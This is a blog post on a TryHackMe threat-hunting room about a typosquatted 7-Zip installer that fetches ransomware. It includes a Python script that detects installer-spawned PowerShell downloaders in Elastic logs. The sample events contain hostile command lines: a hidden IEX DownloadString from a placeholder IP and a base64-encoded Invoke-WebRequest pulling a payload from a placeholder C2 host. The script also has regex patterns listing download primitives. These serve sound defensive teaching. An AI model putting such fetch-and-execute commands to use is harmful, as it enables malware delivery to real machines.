Ransomware Detection Using SIEM | Elastic Search | TryHackMe Hunt Me II: Typo Squatters

Motasem Hamdan

We covered a scenario in which a Windows machine was compromised through a fake 7-Zip archiving tool: a typosquatted Windows installer that, once run, used PowerShell to download ransomware from a C2 server. The scenario discussed in the video involves investigating the network and endpoint logs collected from the compromised machine in Elasticsearch to hunt for the indicated threats and extract indicators of compromise. This was part of the TryHackMe Hunt Me II: Typo Squatters room.
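One way to carry out the hunt described above, as an added example rather than the room's data or the author's code: the records below are constructed Sysmon-style process-creation and network-connection events, flattened to the Elastic Common Schema field names you would type into Kibana (process.name, process.parent.name, destination.ip, and so on); every host, user, path, IP and URL is made up. The rule flags PowerShell spawned by an installer whose command line fetches remote content, decodes -EncodedCommand arguments before matching (a substring search in Kibana would miss those), pulls the URLs out as IOCs, and pivots them into the network events.

```python
"""Hunt for installer-spawned PowerShell downloaders and pivot the extracted IOCs.

Constructed example: events mimic Sysmon Event ID 1 (process) and Event ID 3
(network) as Winlogbeat would ship them, using assumed ECS field names.
"""
import base64
import re
from urllib.parse import urlparse


def _enc(script):
    """Encode a script the way `powershell -EncodedCommand` expects: UTF-16LE, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation events (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"host.name": "WKSTN-01", "process.name": "chrome.exe", "process.parent.name": "explorer.exe",
     "process.command_line": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"'},
    {"host.name": "WKSTN-01", "process.name": "msiexec.exe", "process.parent.name": "explorer.exe",
     "process.command_line": 'msiexec.exe /i "C:\\Users\\perry\\Downloads\\7z-setup.msi"'},
    # Installer-spawned PowerShell pulling a second stage in clear text.
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "process.parent.name": "msiexec.exe",
     "process.command_line": 'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
                             ".DownloadString('http://198.51.100.23/stage.ps1')\""},
    # Same behaviour, but the download is hidden inside a base64-encoded command.
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "process.parent.name": "7z-setup-helper.exe",
     "process.parent.executable": "C:\\Users\\perry\\AppData\\Local\\Temp\\7z-setup-helper.exe",
     "process.command_line": "powershell.exe -nop -enc " + _enc(
         "Invoke-WebRequest -Uri http://c2.example.invalid/payload.exe -OutFile $env:TEMP\\svc.exe")},
    # Installer-spawned PowerShell without a download primitive: not flagged by this rule.
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "process.parent.name": "msiexec.exe",
     "process.command_line": 'powershell.exe -c "New-Item -ItemType Directory $env:ProgramData\\7z"'},
    # Interactive admin use: not flagged.
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "process.parent.name": "explorer.exe",
     "process.command_line": "powershell.exe Get-Service"},
]

# Constructed network-connection events (not real telemetry).
SAMPLE_NETWORK_EVENTS = [
    {"host.name": "WKSTN-01", "process.name": "chrome.exe", "destination.ip": "203.0.113.10", "destination.domain": "search.example.com"},
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "destination.ip": "198.51.100.23", "destination.domain": ""},
    {"host.name": "WKSTN-01", "process.name": "powershell.exe", "destination.ip": "198.51.100.77", "destination.domain": "c2.example.invalid"},
    {"host.name": "WKSTN-01", "process.name": "svchost.exe", "destination.ip": "203.0.113.40", "destination.domain": "update.example.com"},
]

INSTALLER_PARENTS = {"msiexec.exe", "setup.exe"}
# Parent binaries living in user-writable locations are treated as installers too.
USER_WRITABLE_PATH = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData)\\|\\Windows\\Temp\\", re.I)
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b|Net\.WebClient", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def expand_command_line(cmd):
    """Return the command line plus the decoded body of any -EncodedCommand argument."""
    parts = [cmd]
    for b64 in ENCODED_ARG.findall(cmd):
        try:
            parts.append(base64.b64decode(b64).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not valid base64/UTF-16LE; keep hunting on the raw text
    return "\n".join(parts)


def is_installer_parent(event):
    parent = event.get("process.parent.name", "").lower()
    return parent in INSTALLER_PARENTS or bool(USER_WRITABLE_PATH.search(event.get("process.parent.executable", "")))


def hunt_process_events(events):
    """Flag PowerShell spawned by an installer whose (decoded) command line fetches remote content."""
    findings = []
    for ev in events:
        if ev.get("process.name", "").lower() not in {"powershell.exe", "pwsh.exe"}:
            continue
        if not is_installer_parent(ev):
            continue
        text = expand_command_line(ev.get("process.command_line", ""))
        if not DOWNLOAD_PRIMITIVES.search(text):
            continue
        findings.append({"host": ev["host.name"], "parent": ev["process.parent.name"],
                         "urls": sorted(set(URL.findall(text)))})
    return findings


def extract_network_iocs(findings):
    """Reduce flagged URLs to the IPs/domains to pivot on in network logs."""
    return sorted({urlparse(u).hostname for f in findings for u in f["urls"] if urlparse(u).hostname})


def pivot_network_events(iocs, net_events):
    """Return network events whose destination IP or domain matches an extracted IOC."""
    return [ev for ev in net_events
            if ev.get("destination.ip") in iocs or ev.get("destination.domain", "").lower() in iocs]


if __name__ == "__main__":
    hits = hunt_process_events(SAMPLE_PROCESS_EVENTS)
    for hit in hits:
        print(f"{hit['host']}: {hit['parent']} -> powershell fetching {hit['urls']}")
    iocs = extract_network_iocs(hits)
    print("network IOCs:", iocs)
    for ev in pivot_network_events(iocs, SAMPLE_NETWORK_EVENTS):
        print("C2 connection:", ev["process.name"], "->", ev["destination.ip"], ev["destination.domain"])
```

In Kibana the equivalent first pass is a KQL filter such as `process.name : "powershell.exe" and process.parent.name : "msiexec.exe"`, after which the command lines are read by hand; the decoding step above is what that filter cannot do, since the cmdlet names never appear in the stored command_line field when -EncodedCommand is used. Note that the rule deliberately requires a download primitive, so the installer-spawned PowerShell that only creates a directory is left out; during an actual hunt you would review every installer-spawned PowerShell on the host, not only the ones that match.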

The scenario

Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.

Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.

Check out the video below for a detailed explanation.

Room Answers | Elastic Search | TryHackMe Hunt Me II: Typo Squatters

Room answers can be found here.

Video Walkthrough | TryHackMe Hunt Me II: Typo Squatters


Motasem Hamdan is a cybersecurity consultant and content creator. He is also a marketing expert and growth hacker. https://www.youtube.com/@MotasemHamdan